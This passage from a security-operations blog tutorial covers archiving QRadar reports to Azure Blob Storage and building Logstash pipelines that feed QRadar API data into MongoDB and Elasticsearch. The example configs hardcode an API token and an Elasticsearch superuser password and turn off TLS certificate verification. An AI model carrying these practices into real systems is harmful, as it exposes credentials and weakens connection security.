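The loop above opens PDF/<report id>.pdf for every report directory, so a single directory without that file would stop the run with an IOError. Before uploading anything, a dry run that only lists which PDFs exist may help. This sketch works on both Python 2.7 and 3; the reason a PDF might be missing (for example, a report configured for a different output format) is an assumption we have not verified.

```python
from os import listdir
from os.path import isdir, isfile, join


def find_report_pdfs(base_dir):
    """Split expected report PDFs under base_dir into (found, missing).

    Uses the same layout as the loop above:
        <base_dir>/<report directory>/PDF/<report id>.pdf
    Entries that are not directories, or whose names do not follow the
    SCHEDULE#^#OWNER#$#ID#^#MILLIS pattern, are ignored.
    """
    found, missing = [], []
    for name in sorted(listdir(base_dir)):
        report_dir = join(base_dir, name)
        parts = name.split("#")
        if not isdir(report_dir) or len(parts) != 7:
            continue
        pdf_path = join(report_dir, "PDF", "%s.pdf" % parts[4])
        if isfile(pdf_path):
            found.append(pdf_path)
        else:
            missing.append(pdf_path)
    return found, missing
```

For example, found, missing = find_report_pdfs('/store/reporting/reports/admin/reports') lets you review the missing list before deciding whether to run the uploads.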

Version 1 on Azure

After executing the Python script, we can see that all the QRadar reports were successfully uploaded to the qradar-reports container.

Version 2 on Azure

After executing the Python script, we can see that the qradar-reports container has a new folder called 2022, corresponding to the year that all the QRadar reports were generated.

If we open 2022, we can see two folders - 7 and 9, corresponding to the months of July 2022 and September 2022 respectively.

If we open 7, we can see two folders - 19 and 21, corresponding to the days the QRadar reports were generated in July 2022.

If we open 21, we can see that the QRadar reports generated on 21st July 2022 were successfully uploaded.

Version 3 on Azure

After executing the Python script, we can see that the qradar-reports container has three new folders - Offense Report, Overview Report, and Top Users by Remote Access Activity, corresponding to the unique report titles of the QRadar reports.

If we open Overview Report, we can see that all the QRadar reports (with title = Overview Report) were successfully uploaded.

Conclusion

In this tutorial, we learnt how to archive QRadar reports to Azure Blob Storage using Python. To summarize:

We started by discussing where and how reports are stored and organized in QRadar. We also dissected the directory naming convention employed by QRadar for each report.

On the Azure Portal, we configured Azure Blob Storage to serve as a storage location for the QRadar reports. We started by creating a resource group, which is a virtual container for related resources. Next, we created a storage account and tied it to the newly created resource group. Then, we created a container within the storage account, which is where the blobs (QRadar reports) would reside. Finally, we acquired a connection string to programmatically authenticate to and interact with the storage account.

Then, we began our journey to write the Python script.

First, we installed the Azure Blob Storage Client Library for Python, which is a Python library to interact with the Azure Blob Storage service without having to recreate essential functionality. Next, we discussed how to identify the name (title) of a QRadar report based on its ID by searching inside the report.properties file within each report directory. Based on this understanding, we implemented Python code to achieve the mapping. Next, we discussed and implemented 3 unique versions of organizing QRadar reports on Azure Blob Storage:

Version 1 - All reports in one container
Version 2 - Reports organized by year, month, and day
Version 3 - Reports organized by name
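The three layouts differ only in the blob name each report is uploaded under. The sketch below illustrates this under stated assumptions: the helper names and the report.pdf file name are hypothetical, and the unpadded year/month/day folders are inferred from the 7, 19, and 21 folders shown above rather than taken from the original script.

```python
from datetime import date

# Hypothetical helpers: the layouts are inferred from the folders shown
# above (e.g. 7 -> 19 and 21), not copied from the original script.


def blob_name_v1(file_name: str) -> str:
    """Version 1: every report sits at the root of one container."""
    return file_name


def blob_name_v2(report_date: date, file_name: str) -> str:
    """Version 2: year/month/day virtual folders, without zero padding."""
    return f"{report_date.year}/{report_date.month}/{report_date.day}/{file_name}"


def blob_name_v3(report_title: str, file_name: str) -> str:
    """Version 3: one virtual folder per unique report title."""
    return f"{report_title}/{file_name}"


if __name__ == "__main__":
    print(blob_name_v2(date(2022, 7, 21), "report.pdf"))  # 2022/7/21/report.pdf
    print(blob_name_v3("Overview Report", "report.pdf"))  # Overview Report/report.pdf
```

With the Azure Blob Storage client library, a name built this way would typically be passed as the name argument of ContainerClient.upload_blob(); the helpers themselves make no Azure calls.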

Finally, we executed the script by iterating through each report directory and visualized the output of each version on Azure.

Using the concepts and example code from this tutorial, you can easily write your own scripts to archive QRadar reports to Azure or another Cloud Service Provider for long-term storage.

I hope you enjoyed reading this tutorial. Please reach out if you have any questions or comments.

Complete Code

You can download the Python script from GitHub below. To execute the script, run:

python qradar-reports-azure-blob.py

Note: Make sure you edit line number 11 and paste your own valid connection string. See above for how to acquire the connection string.

Note: Make sure you install the Azure Blob Storage Client Library for Python as explained above.

Qradar Logstash

2022-07-14T00:00:00+00:00

Introduction

In this tutorial, we will learn how to build ETL pipelines using Logstash to programmatically fetch raw data from QRadar REST APIs, apply processing, and output into various formats and destinations.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

Note: This tutorial also assumes you have some experience with Logstash. Please refer to A Practical Introduction to Logstash for a quick refresher.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
QRadar API Token

On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console. Please refer here for a quick walkthrough.
Logstash

I am using Logstash 8.1.3 on a CentOS 7 Linux VM.

For more information about installing Logstash on your OS, please refer to Installing Logstash.
Elasticsearch

I am using Elasticsearch 8.3.2 on a CentOS 7 Linux VM.

For more information about installing Elasticsearch on your OS, please refer to Installing Elasticsearch.
MongoDB

I am using MongoDB Community Edition 5.0.8 on a CentOS 7 Linux VM.

For more information about installing MongoDB Community Edition on your OS, please refer to Install MongoDB Community Edition.
MongoDB output plugin for Logstash

Install the plugin using the logstash-plugin utility:

/usr/share/logstash/bin/logstash-plugin install --version=3.1.5 logstash-output-mongodb

Note: I installed version 3.1.5 as I came across a known bug with the latest version. Your mileage may vary. Please review the plugin’s GitHub repo prior to installation and usage.

ETL & Logstash

According to IBM:

ETL, which stands for extract, transform and load, is a data integration process that combines data from multiple data sources into a single, consistent data store that is loaded into a data warehouse or other target system.

ETL provides the foundation for data analytics and machine learning workstreams. Through a series of business rules, ETL cleanses and organizes data in a way which addresses specific business intelligence needs, like monthly reporting, but it can also tackle more advanced analytics, which can improve back-end processes or end user experiences.

Why would we need to perform ETL operations on QRadar data?

One common use-case is to build reports and dashboards on external Business Intelligence (BI) tools and platforms. While QRadar comes with in-built reporting and dashboarding capabilities, it is often desirable to fuse and correlate data from various sources to generate further insights. In a SOC, this is typically done manually by harnessing reports generated by multiple systems (such as SIEM, SOAR, EDR, and Vulnerability Management, among many others). This can easily become a tiresome and repetitive approach to SOC reporting, especially when the same reports and dashboards must be produced and delivered on a daily, weekly, and/or monthly basis.

With a well-defined, automated approach to reporting in place, SOC teams can focus on other critical activities, such as writing better detection rules, fine-tuning, and troubleshooting. This is where Logstash comes in.

According to Elastic:

Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite “stash.”

By leveraging the capabilities of Logstash, we can easily fetch data from QRadar, transform it dynamically to meet our reporting requirements, and output it to a variety of destinations (including files and databases).

Logstash Pipeline Configuration

According to Logstash documentation:

The Logstash event processing pipeline has three stages: inputs → filters → outputs. Inputs generate events, filters modify them, and outputs ship them elsewhere. Inputs and outputs support codecs that enable you to encode or decode the data as it enters or exits the pipeline without having to use a separate filter.
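To make the three stages concrete, here is a toy model in Python. It only illustrates the inputs → filters → outputs flow described in the quote and is not how Logstash is implemented; run_pipeline and the sample events are hypothetical.

```python
from typing import Callable, Iterable, Optional

Event = dict
# A filter returns the (possibly modified) event, or None to drop it.
Filter = Callable[[Event], Optional[Event]]
Output = Callable[[Event], None]


def run_pipeline(inputs: Iterable[Event], filters: list[Filter], outputs: list[Output]) -> None:
    """Push each event from the input stage through every filter, then every output."""
    for event in inputs:                  # inputs generate events
        for apply_filter in filters:      # filters modify them...
            event = apply_filter(event)
            if event is None:             # ...or drop them
                break
        else:                             # runs only if no filter dropped the event
            for ship in outputs:          # outputs ship them elsewhere
                ship(event)


# Usage: drop disabled items and "ship" the rest into a list.
shipped: list = []
run_pipeline(
    inputs=[{"id": 1, "enabled": True}, {"id": 2, "enabled": False}],
    filters=[lambda e: e if e["enabled"] else None],
    outputs=[shipped.append],
)
print(shipped)  # [{'id': 1, 'enabled': True}]
```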

Example #1: QRadar Rules to STDOUT

We will start with a simple goal to retrieve all the Rules deployed on QRadar and print them out to the standard output (STDOUT).

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Rules REST API endpoint. This involves making an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter. To achieve this, we will leverage the Logstash Http_poller input plugin.

Note: Unlike the MongoDB output plugin, the Http_poller input plugin is available by default and does not require manual installation.

Note: Use the command /usr/share/logstash/bin/logstash-plugin list to display all the installed plugins.

input {
        http_poller 
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/analytics/rules"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

Let us go line-by-line in the above snippet and discuss the various configuration options.

schedule is specified to indicate how often Logstash polls the given URL. In the above snippet, we have used { cron => "* * * * *" } which indicates that Logstash must poll the QRadar Rules API endpoint URL once every minute.
ssl_verification_mode is specified to indicate whether Logstash must verify the server certificate. In the above snippet, we have used "none", which tells Logstash not to verify the QRadar Console certificate. This is acceptable in a lab, but certificate verification should be enabled in production environments for better security.
urls is specified to describe the URLs and their associated options. It is important to note that multiple URLs can be specified in one configuration file, if desired. Each URL specified in the configuration file requires a "name" which can be used to distinguish the outputs. In the above snippet, we have one URL configuration (qradar_rules_url) in which we specify method as get, url as "https://192.168.56.144/api/analytics/rules", and headers as { SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac" }.
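To see what the http_poller input does on each scheduled run, the sketch below builds the same request with Python's standard library. It assumes the console address and endpoint from the snippet above and a placeholder token; the helper names are hypothetical. The split_events helper mirrors how, as we understand it, Logstash's json codec (the http_poller default) turns a top-level JSON array into one event per element, which is why each Rule shows up as a separate event in the output further down.

```python
import json
import ssl
import urllib.request


def build_qradar_request(console: str, path: str, sec_token: str) -> urllib.request.Request:
    """A GET request that carries the SEC token as an HTTP header."""
    return urllib.request.Request(
        f"https://{console}{path}", method="GET", headers={"SEC": sec_token}
    )


def unverified_context() -> ssl.SSLContext:
    """Rough equivalent of ssl_verification_mode => "none" (lab use only)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # must be disabled before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def split_events(body: str) -> list:
    """One event per element of a top-level JSON array, else a single event."""
    data = json.loads(body)
    return data if isinstance(data, list) else [data]


req = build_qradar_request("192.168.56.144", "/api/analytics/rules", "<your-sec-token>")
# To actually send it:
# with urllib.request.urlopen(req, context=unverified_context()) as resp:
#     events = split_events(resp.read().decode("utf-8"))
```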

Note: The complete QRadar API URL is provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

Filter

Our goal in the filter stage is to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

filter {
        prune {
            whitelist_names => ["^id$","^name$","^creation_date$","^enabled$"]
        }
}

whitelist_names is specified to indicate the fields that must be included in the output event. Note that the field names must be given as an array of regular expressions. In the above snippet, we have specified the id, name, creation_date, and enabled fields to be included in the output event.
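The effect of whitelist_names can be sketched in a few lines of Python. This is a simplified model that only looks at top-level field names; prune_whitelist is a hypothetical helper, and the identifier field in the sample is illustrative. It also shows why the patterns are anchored with ^ and $: an unanchored id would also keep any field whose name merely contains id.

```python
import re


def prune_whitelist(event: dict, whitelist_names: list) -> dict:
    """Keep only top-level fields whose name matches at least one regex."""
    patterns = [re.compile(p) for p in whitelist_names]
    return {k: v for k, v in event.items() if any(p.search(k) for p in patterns)}


rule = {"id": 100295, "identifier": "illustrative-value",
        "name": "Local L2R LDAP Server Scanner", "enabled": True,
        "creation_date": 1146812962422}

print(prune_whitelist(rule, ["^id$", "^name$", "^creation_date$", "^enabled$"]))
# {'id': 100295, 'name': 'Local L2R LDAP Server Scanner', 'enabled': True, 'creation_date': 1146812962422}
print(sorted(prune_whitelist(rule, ["id"])))  # ['id', 'identifier']
```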

Note: Please refer to this section about the QRadar Rules API endpoint in my blog post titled QRadar REST APIs with Python to learn more about the QRadar Rules API endpoint including its returned fields, parameters, and JSON response.

Note: You can also choose to leverage the whitelist_values, blacklist_names, and blacklist_values configuration options.

Output

Our goal in the output stage is to simply print the processed event to the standard output (STDOUT). To achieve this, we will leverage the Stdout output plugin.

output {
        stdout {}
}

Although not used in the above snippet, the codec configuration option can be specified to control how the output event is encoded. The default value is rubydebug.

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller 
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_rules_url => {
                    method => get
                    url => "https://192.168.56.144/api/analytics/rules"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}
filter {
        prune {
            whitelist_names => ["^id$","^name$","^creation_date$","^enabled$"]
        }
}
output {
        stdout {}
}

As mentioned in the Specifying Pipelines section in A Practical Introduction to Logstash:

The easiest way to start Logstash is to have Logstash create a single pipeline based on a single configuration file that we specify through the -f command line parameter.

Assuming the above configuration file is saved as qradar-rules.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-rules.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If the logstash command is not found in your PATH, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. It has been truncated, as listing every Rule would take too many lines.

{
               "id" => 100295,
             "name" => "Local L2R LDAP Server Scanner",
          "enabled" => true,
    "creation_date" => 1146812962422
}
{
               "id" => 100296,
             "name" => "First-Time User Access to Critical Asset",
          "enabled" => true,
    "creation_date" => 1440696183560
}
{
               "id" => 100297,
             "name" => "Malware or Virus Clean Failed",
          "enabled" => true,
    "creation_date" => 1280932510492
}
{
               "id" => 100302,
             "name" => "Excessive Failed Logins to Compliance IS",
          "enabled" => false,
    "creation_date" => 1123776255889
}
{
               "id" => 100303,
             "name" => "Auditing Services Changed on Compliance Host",
          "enabled" => false,
    "creation_date" => 1279294472002
}
.
.
.

This approach of using STDOUT as the output destination is valuable when developing and debugging Logstash configurations.

Example #2: QRadar Log Sources to MongoDB

In the previous section, we managed to make an API request to fetch QRadar Rules, whitelist required fields, and output to STDOUT.

In this section, we will take it a step further. Here, our goal is to fetch and persist all the Log Sources on QRadar as BSON documents within a MongoDB database collection.

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Log Sources REST API endpoint. Similar to the previous example, we will leverage the Logstash Http_poller input plugin to make an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_log_sources_url => {
                    method => get
                    url => "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

The configuration options in the above snippet are exactly the same as the previous example. The only change made is in the urls option, in which we specify url as "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources".

Filter

We have multiple goals in the filter stage.

One goal is similar to the previous example - we want to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

The other goal is to craft the output event with the exact fields required by MongoDB. One such field is _id.

According to MongoDB documentation:

In MongoDB, each document stored in a collection requires a unique _id field that acts as a primary key. If an inserted document omits the _id field, the MongoDB driver automatically generates an ObjectId for the _id field.

In our case, an API request to the QRadar Log Sources REST API endpoint returns multiple fields in the JSON response including a unique ID for each Log Source. We need to add a field called _id to the output event with the value of the unique Log Source ID for each Log Source. To achieve this, we will leverage the Mutate filter plugin.

Note: A complete list of the returned fields is provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

filter {
        mutate {
                add_field => {
                    "_id" => "%{[id]}"
                }
        }
        prune {
                whitelist_names => ["^@timestamp$","^_id$","^name$","^description$","^creation_date$","^enabled$"]
        }
}

add_field is specified to add a new field to the output event. In the above snippet, we have specified "_id" as the new field to be added which contains the value in the Log Source ID field "%{[id]}" from the input event.
whitelist_names is specified to indicate the fields that must be included in the output event. Note that the field names must be given as an array of regular expressions. In the above snippet, we have specified the @timestamp, _id, name, description, creation_date, and enabled fields to be included in the output event.
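Put together, the mutate and prune filters above turn each Log Source into a MongoDB-ready document. The sketch below models that under simplifying assumptions (top-level fields only, and no @timestamp in the sample); to_mongo_document is a hypothetical helper, and the sample values are taken from the Logstash output further down. Note that %{[id]} renders the ID as a string, which matches the quoted "_id" values in that output.

```python
import re


def to_mongo_document(event: dict, whitelist_names: list) -> dict:
    """mutate add_field "_id" => "%{[id]}", then prune with whitelist_names."""
    doc = dict(event)
    doc["_id"] = str(event["id"])     # the field reference yields a string
    patterns = [re.compile(p) for p in whitelist_names]
    return {k: v for k, v in doc.items() if any(p.search(k) for p in patterns)}


log_source = {"id": 1462, "name": "Experience Center: WindowsAuthServer @ EC: TIGER-PC",
              "description": "WindowsAuthServer Device", "enabled": True,
              "creation_date": 1550780844476}
whitelist = ["^@timestamp$", "^_id$", "^name$", "^description$",
             "^creation_date$", "^enabled$"]
print(to_mongo_document(log_source, whitelist))
```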

Output

Our goal in the output stage is to persist the processed event to a specific collection within a MongoDB database. To achieve this, we will leverage the Mongodb output plugin as mentioned in the pre-requisites. We will also print the event to the standard output (STDOUT) for debugging purposes. For this, we will leverage the Stdout output plugin.

output {
        stdout {}
        mongodb {
            id => "my_mongodb_plugin_id"
            collection => "qradar_log_sources"
            database => "qradar"
            uri => "mongodb://localhost:27017"
        }
}

id is specified to add a unique ID to the plugin configuration. In the above snippet, we have specified id as "my_mongodb_plugin_id". This is optional, but recommended.
collection is specified to indicate the MongoDB collection to store the documents. In the above snippet, we have specified collection as "qradar_log_sources". If the collection does not exist, it is automatically created.
database is specified to indicate the MongoDB database containing the collection of documents. In the above snippet, we have specified database as "qradar". If the database does not exist, it is automatically created.
uri is specified to indicate the MongoDB connection string used to connect to the MongoDB server. In the above snippet, we have specified uri as "mongodb://localhost:27017".

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_log_sources_url => {
                    method => get
                    url => "https://192.168.56.144/api/config/event_sources/log_source_management/log_sources"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}
filter {
        mutate {
                add_field => {
                    "_id" => "%{[id]}"
                }
        }
        prune {
                whitelist_names => ["^@timestamp$","^_id$","^name$","^description$","^creation_date$","^enabled$"]
        }
}
output {
        stdout {}
        mongodb {
            id => "my_mongodb_plugin_id"
            collection => "qradar_log_sources"
            database => "qradar"
            uri => "mongodb://localhost:27017"
        }
}

Assuming the above configuration file is saved as qradar-log-sources.conf, we can run it with Logstash using the command:

logstash -f /root/logstash-blog/qradar-log-sources.conf

Note: Please ensure that you specify the full path to the .conf file. By default, Logstash will attempt to find the .conf file in /usr/share/logstash/.

Note: If the logstash command is not found in your PATH, try using /usr/share/logstash/bin/logstash instead.

The output from Logstash is seen below. It has been truncated, as listing every Log Source would take too many lines.

{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191668Z,
      "description" => "WindowsAuthServer Device",
    "creation_date" => 1550780844476,
             "name" => "Experience Center: WindowsAuthServer @ EC: TIGER-PC",
              "_id" => "1462"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191702Z,
      "description" => "WindowsAuthServer device",
    "creation_date" => 1550780906185,
             "name" => "Experience Center: WindowsAuthServer @ EC: MachineA",
              "_id" => "1512"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191769Z,
      "description" => "AWS CloudTrail",
    "creation_date" => 1549879441512,
             "name" => "Experience Center: AWS Syslog @ 192.168.0.17",
              "_id" => "912"
}
{
          "enabled" => true,
       "@timestamp" => 2022-06-05T12:49:00.191801Z,
      "description" => "Cisco IronPort",
    "creation_date" => 1552586738421,
             "name" => "Experience Center: Cisco IronPort @ 192.168.0.15",
              "_id" => "1112"
}
.
.
.

Similarly, we can verify that the data was stored in MongoDB by connecting to the server using the MongoDB Shell (mongosh). The outputs of various queries are seen below.

> use qradar
switched to db qradar

> show collections
qradar_log_sources

> db.qradar_log_sources.countDocuments()
21

> db.qradar_log_sources.findOne()
{
    _id: '1262',
    description: 'WindowsAuthServer device',
    creation_date: Long("1540394721928"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ 172.16.0.4',
    '@timestamp': '"2022-06-05T14:18:01.445500Z"'
}

> db.qradar_log_sources.find({description: "WindowsAuthServer device"})
[
  {
    _id: '1262',
    description: 'WindowsAuthServer device',
    creation_date: Long("1540394721928"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ 172.16.0.4',
    '@timestamp': '"2022-06-05T14:18:01.445500Z"'
  },
  {
    _id: '1562',
    description: 'WindowsAuthServer device',
    creation_date: Long("1550780938011"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ EC: MachineB',
    '@timestamp': '"2022-06-05T14:18:01.446069Z"'
  },
  {
    _id: '1512',
    description: 'WindowsAuthServer device',
    creation_date: Long("1550780906185"),
    enabled: true,
    name: 'Experience Center: WindowsAuthServer @ EC: MachineA',
    '@timestamp': '"2022-06-05T14:18:01.446357Z"'
  }
]

As seen in the above snippets, we can now perform queries, aggregations, and other operations on our BSON documents within the MongoDB database collection. Furthermore, we can integrate MongoDB with Business Intelligence (BI) platforms to produce automated reports and dashboards.

Example #3: QRadar Offenses to Elasticsearch

In the previous section, we managed to fetch QRadar Log Sources by making an API request, add a new _id field, and persist JSON data records as BSON documents within a MongoDB database collection.

In this section, we will focus on a more complex goal. Here, our goal is to capture a subset of SSH login violations from all the Offenses generated on QRadar and ship only those Offenses to an Elasticsearch index. The desired Offenses contain the phrase “Bad Username” within their description fields.

Input

Our goal in the input stage is to fetch raw JSON data from the QRadar Offenses REST API endpoint. Similar to the previous examples, we will leverage the Logstash Http_poller input plugin to make an HTTP request to the QRadar Console by supplying a valid SEC Token as a Header parameter.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_offenses_url => {
                    method => get
                    url => "https://192.168.56.144/api/siem/offenses"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
                    }
                }
            }
        }
}

The configuration options in the above snippet are exactly the same as the previous examples. The only change made is in the urls option, in which we specify url as "https://192.168.56.144/api/siem/offenses".

Filter

Similar to the previous example, we have multiple goals in the filter stage.

First of all, we want to limit the Offenses to the desired subset of SSH login violations. As mentioned above, these Offenses contain the phrase “Bad Username” within their description fields. To achieve this, we will leverage a conditional statement using the regexp (=~) comparison operator. In this manner, only those events that match the criteria are allowed through. The remaining events hit the else block. Since we are not interested in the other Offenses, we simply ignore (or drop) them. To achieve this, we will leverage the Drop filter plugin.
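The conditional-plus-drop logic can be modelled as a Python generator: events whose description matches the regex pass through, and everything else is discarded. keep_bad_username and the sample Offenses are hypothetical; in this sketch, a missing description is treated as a non-match, so such events are dropped too.

```python
import re
from typing import Iterable, Iterator

BAD_USERNAME = re.compile("Bad Username")


def keep_bad_username(offenses: Iterable[dict]) -> Iterator[dict]:
    """if [description] =~ "Bad Username" { ... } else { drop {} }"""
    for offense in offenses:
        if BAD_USERNAME.search(offense.get("description", "")):
            yield offense        # continues to the transformations and outputs
        # otherwise the Offense is dropped and never reaches the output stage


offenses = [  # illustrative descriptions, not real QRadar output
    {"id": 16, "description": "Bad Username (illustrative description)"},
    {"id": 99, "description": "Some other Offense"},
    {"id": 100},
]
print([o["id"] for o in keep_bad_username(offenses)])  # [16]
```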

Next, we can define all the required transformations on the event.

One goal is to convert the start_time timestamp from its default format (milliseconds since the UNIX epoch) to a more human-readable format (ISO 8601). To achieve this, we will leverage the Date filter plugin.

Since our example revolves around capturing SSH login violations, it is valuable to capture the username associated with each Offense in a separate field. To achieve this, we will leverage the Mutate filter plugin. Similarly, we will leverage the same plugin to modify the description field to include the username.

The final transformation goal is similar to the previous examples - we want to limit the fields that are returned by the QRadar REST API endpoint. To achieve this, we will leverage the Prune filter plugin.

Note: A complete list of the returned fields is provided on the QRadar Interactive API Documentation page corresponding to the endpoint.

filter {
        if [description] =~ "Bad Username" {
            date {
                match => ["start_time", "UNIX_MS"]
                target => "start_time"
            }
            mutate {
                add_field => {
                    "username" => "%{[offense_source]}"
                }
                replace => {
                    "description" => "Bad Username Detected - %{offense_source}"
                }
            }
            prune {
                whitelist_names => ["^id$","^magnitude$","^start_time$","^username$","^description$","^categories$"]
            }
        }
        else {
           drop {}
        }
}

match and target are used together to parse a timestamp value and store it in a target field. In the above snippet, we have specified that "start_time" must be parsed as "UNIX_MS" (milliseconds since the UNIX epoch). By default, the parsed timestamp is output in ISO 8601 format. Since target names the same field ("start_time"), the original value is simply overwritten.

Note: According to Logstash documentation, the @timestamp field of the event is updated if target is not specified alongside match.
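For reference, this is the conversion the Date filter performs here, sketched in Python: an integer count of milliseconds since the UNIX epoch becomes an ISO 8601 UTC string with millisecond precision, as in the start_time values shown in the output further down. unix_ms_to_iso8601 is a hypothetical helper, and the sample input was back-calculated from the first Offense's displayed start_time rather than taken from QRadar.

```python
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def unix_ms_to_iso8601(ms: int) -> str:
    """Mimic date { match => ["start_time", "UNIX_MS"] }, rendered in UTC."""
    dt = EPOCH + timedelta(milliseconds=ms)   # integer math avoids float rounding
    return dt.strftime("%Y-%m-%dT%H:%M:%S") + f".{dt.microsecond // 1000:03d}Z"


print(unix_ms_to_iso8601(1657738427388))  # 2022-07-13T18:53:47.388Z
```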

add_field is specified to add a new field to the output event. In the above snippet, we have specified "username" as the new field which contains the value of "offense_source" from the input event.
replace is specified to replace the value of an existing field, or add the field if it does not exist. In the above snippet, we have specified "description" with a new value of "Bad Username Detected - %{offense_source}" in which the %{offense_source} is substituted with the actual username associated with the Offense.
whitelist_names is specified to indicate the fields that must be included in the output event. Note that the field names must be given as an array of regular expressions. In the above snippet, we have specified the id, magnitude, start_time, username, description, and categories fields to be included in the output event.
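The %{...} references used by add_field and replace are substituted with values from the event. A simplified sketch of that substitution, limited to top-level fields, follows; sprintf and apply_mutate are hypothetical helper names, and leaving an unresolved reference unchanged is our assumption about how missing fields are handled.

```python
import re

# Matches %{field} and %{[field]} (top-level fields only in this sketch).
FIELD_REF = re.compile(r"%\{\[?([^\[\]{}]+)\]?\}")


def sprintf(template: str, event: dict) -> str:
    """Replace each field reference with the event's value; keep unknown ones as-is."""
    return FIELD_REF.sub(
        lambda m: str(event[m.group(1)]) if m.group(1) in event else m.group(0),
        template,
    )


def apply_mutate(offense: dict) -> dict:
    """The add_field and replace settings from the filter above."""
    out = dict(offense)
    out["username"] = sprintf("%{[offense_source]}", offense)
    out["description"] = sprintf("Bad Username Detected - %{offense_source}", offense)
    return out


print(apply_mutate({"id": 16, "offense_source": "pepsi"}))
```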

Output

Our goal in the output stage is to persist the processed event to a specific index within Elasticsearch. To achieve this, we will leverage the Elasticsearch output plugin. We will also print the event to the standard output (STDOUT) for debugging purposes. For this, we will leverage the Stdout output plugin.

Note: Unlike the MongoDB output plugin, the Elasticsearch output plugin is available by default and does not require manual installation.

Note: Use the command /usr/share/logstash/bin/logstash-plugin list to display all the installed plugins.

output {
        stdout {}
        elasticsearch {
            index => "bad-username-offenses"
            document_id => "%{[id]}"
            hosts => "https://127.0.0.1:9200"
            user => "elastic"
            password => "luKCzUWSLiL=Ah7rUanu"
            cacert => "/etc/elasticsearch/certs/http_ca.crt"
        }
}

index is specified to indicate the Elasticsearch index to store the documents. In the above snippet, we have specified index as "bad-username-offenses". If the index does not exist, it is automatically created.
document_id is specified to indicate the value to be used as document ID for documents in the Elasticsearch index. In the above snippet, we have specified that the value in the Offense ID field ("%{[id]}") must be used as the document ID.
hosts is specified to indicate the address of the Elasticsearch server. In the above snippet, we have specified hosts as "https://127.0.0.1:9200".
user is specified to indicate the username to be used for authentication to the Elasticsearch cluster. In the above snippet, we have specified user as "elastic".

Note: According to Elastic, it is not recommended to use the elastic superuser unless full access to the cluster is absolutely required. On self-managed deployments, it is advised to use the elastic user to create users that have the minimum necessary roles or privileges for their activities.

password is specified to indicate the password to be used for authentication to the Elasticsearch cluster. In the above snippet, we have specified password as "luKCzUWSLiL=Ah7rUanu".
cacert is specified to indicate the full path of the .cer or .pem file to validate the Elasticsearch server’s certificate. In the above snippet, we have specified cacert as "/etc/elasticsearch/certs/http_ca.crt".
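Setting document_id matters because http_poller fetches the same Offenses again every minute. With the output's default index action, writing a document under an existing ID replaces it instead of adding a copy, so repeated polls do not create duplicates. The dictionary-based sketch below only simulates that behaviour; index_documents is hypothetical and no Elasticsearch client is involved.

```python
def index_documents(index: dict, events: list) -> dict:
    """Simulate the "index" action with document_id => "%{[id]}"."""
    for event in events:
        index[str(event["id"])] = dict(event)   # same _id: the document is replaced
    return index


bad_username_offenses: dict = {}
poll = [{"id": 16, "username": "pepsi"}, {"id": 15, "username": "paratha1"}]
index_documents(bad_username_offenses, poll)   # first poll
index_documents(bad_username_offenses, poll)   # one minute later, same Offenses
print(len(bad_username_offenses))  # 2
```

Without document_id, Elasticsearch would generate a new ID for every event, and each poll would add another copy of every matching Offense.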

Running the Configuration

We can combine the above snippets to create the below configuration file.

input {
        http_poller
        {
            schedule => { cron => "* * * * *" }
            ssl_verification_mode => "none"
            urls => {
                qradar_offenses_url => {
                    method => get
                    url => "https://192.168.56.144/api/siem/offenses"
                    headers => {
                        SEC => "4150d602-11ba-4d55-b3de-b6ebfe8b93ac"
